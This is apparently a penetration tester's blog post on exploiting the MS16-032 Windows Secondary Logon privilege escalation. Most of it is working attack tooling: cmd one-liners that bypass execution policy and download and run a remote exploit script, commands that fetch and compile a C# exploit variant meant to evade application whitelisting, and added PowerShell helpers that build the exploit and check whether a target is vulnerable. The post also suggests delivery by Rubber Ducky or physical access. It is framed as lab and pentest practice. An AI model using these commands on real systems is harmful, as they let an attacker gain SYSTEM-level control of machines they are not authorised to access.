I was playing around with a box in my lab earlier, testing out MS16-032, a privilege escalation exploit that was patched in March 2016 and affected Windows Vista, Server 2008, 7, 8.1, Server 2012, and 10. It was a bug in the Secondary Logon service that allows you to leak a handle opened in a privileged process into a lower-privileged process. @FuzzySec made a PowerShell script to exploit it that works really well, but I wanted to turn it into an easy one-liner to paste into a cmd prompt.
powershell -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/wrlBsL'); Invoke-ms16-032"
I also came across @fdiskyou's GitHub, where he converted the PowerShell script into C# to help bypass application whitelisting and similar controls. The hardest part was figuring out where System.Management.Automation.dll lives on the target, since the path differs between Windows versions. I found I could just use the ([PSObject].Assembly.Location) PowerShell expression, which returns the on-disk path of whatever copy of that assembly the running PowerShell has loaded, and copy the .dll to the %temp% folder.
I made two different versions because I didn't feel like working out how to pass the variables that decide between 32-bit and 64-bit when compiling with csc.exe.
C# 64-bit:
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X64.exe" /platform:x64 "%temp%\ms16-032.cs" && %temp%\ms16-032_X64.exe
C# 32-bit (for a 32-bit Windows install, so it uses the Framework rather than Framework64 folder; csc.exe's valid /platform values are x86 and x64, there is no x32):
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X86.exe" /platform:x86 "%temp%\ms16-032.cs" && %temp%\ms16-032_X86.exe
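As an added example (not part of the original post or of either author's code), here is the architecture detection the two one-liners above sidestep, done in PowerShell: it resolves System.Management.Automation.dll with the same [PSObject].Assembly.Location trick, picks Framework or Framework64 and the matching /platform value from the OS bitness, and drives csc.exe with the same /unsafe and /reference flags the one-liners use. The function name, the $SourcePath and $OutPath parameters, and the assumption that the .cs file is already on disk are mine.

```powershell
# Added example, not the post author's or fdiskyou's code.
# Assumes the C# source has already been fetched to $SourcePath.
function Build-WithAutomationRef {
    param(
        [Parameter(Mandatory)][string]$SourcePath,
        [string]$OutPath = (Join-Path $env:TEMP 'ms16-032.exe')
    )

    # Same trick as in the post: ask the loaded assembly where it lives instead of
    # hard-coding a per-Windows-version path.
    $automationDll = [PSObject].Assembly.Location

    # OS bitness (not the bitness of this PowerShell process) decides which
    # framework folder holds the right csc.exe and which /platform to target.
    if ([Environment]::Is64BitOperatingSystem) {
        $fw = Join-Path $env:windir 'Microsoft.NET\Framework64'
        $platform = 'x64'
    } else {
        $fw = Join-Path $env:windir 'Microsoft.NET\Framework'
        $platform = 'x86'
    }

    # Newest v4.x folder that actually ships a compiler.
    $csc = Get-ChildItem -Path $fw -Directory -Filter 'v4.*' |
        Sort-Object Name -Descending |
        ForEach-Object { Join-Path $_.FullName 'csc.exe' } |
        Where-Object { Test-Path $_ } |
        Select-Object -First 1
    if (-not $csc) { throw "No v4.x csc.exe found under $fw" }

    # Flags mirror the one-liners: /unsafe for the pointer code, a reference to
    # the located automation DLL, and System.IO.Compression.dll by name.
    & $csc /nologo /unsafe "/platform:$platform" `
        "/reference:$automationDll" /reference:System.IO.Compression.dll `
        "/out:$OutPath" $SourcePath
    if ($LASTEXITCODE -ne 0) { throw "csc.exe failed with exit code $LASTEXITCODE" }

    return $OutPath
}

# Usage (paths are placeholders):
# $exe = Build-WithAutomationRef -SourcePath "$env:TEMP\ms16-032.cs"
# & $exe
```

Because the DLL path comes straight from the running PowerShell, the /reference points at the exact build of System.Management.Automation.dll the host uses, which avoids the copy to %temp% entirely; keep the copy step if you want the binary built somewhere other than the machine it runs on.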
Pasting these into a cmd prompt on a vulnerable machine should pop a new cmd prompt running as 'nt authority\system'. This was just an exercise in building simple one-liners for use on pentests; one could combine it with, say, a Rubber Ducky or physical access to the machine to elevate privileges quickly.
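A quick pre-flight check before pasting the one-liners, as an added example that is not part of the original post: the exploit goes through the Secondary Logon service (seclogon), so it needs that service to be startable, and the fix for this bulletin shipped as KB3139914 on Vista/2008/7/8.1/2012. On Windows 10 the fix arrived in a cumulative update instead, so a missing KB3139914 there tells you nothing. The function name is mine.

```powershell
# Added example, not from the original post.
# Reports the facts that decide whether the one-liners are worth trying.
function Test-MS16032Preflight {
    $os  = Get-CimInstance Win32_OperatingSystem
    # seclogon is demand-start by default; if it is Disabled the exploit cannot
    # trigger the vulnerable code path.
    $svc = Get-Service -Name seclogon -ErrorAction SilentlyContinue
    # KB3139914 is the MS16-032 security update for the down-level OS versions.
    $kb  = Get-HotFix -Id KB3139914 -ErrorAction SilentlyContinue

    $isWin10 = $os.Version -like '10.*'

    [pscustomobject]@{
        OSVersion        = $os.Version
        Is64BitOS        = [Environment]::Is64BitOperatingSystem
        SecLogonPresent  = [bool]$svc
        SecLogonStatus   = if ($svc) { $svc.Status.ToString() } else { 'missing' }
        # StartType exists on PowerShell 5+; older versions just report blank.
        SecLogonStart    = if ($svc) { "$($svc.StartType)" } else { 'missing' }
        KB3139914Present = [bool]$kb
        LikelyPatched    = if ($isWin10) { 'unknown: check cumulative update level' }
                           elseif ($kb) { 'yes' } else { 'no KB3139914 found' }
    }
}

Test-MS16032Preflight | Format-List
```

Read the output as a filter, not a verdict: a disabled seclogon or a present KB3139914 means the one-liners will not work, while a clean result on Windows 10 still needs the build number compared against the March 2016 cumulative update before you spend time on it.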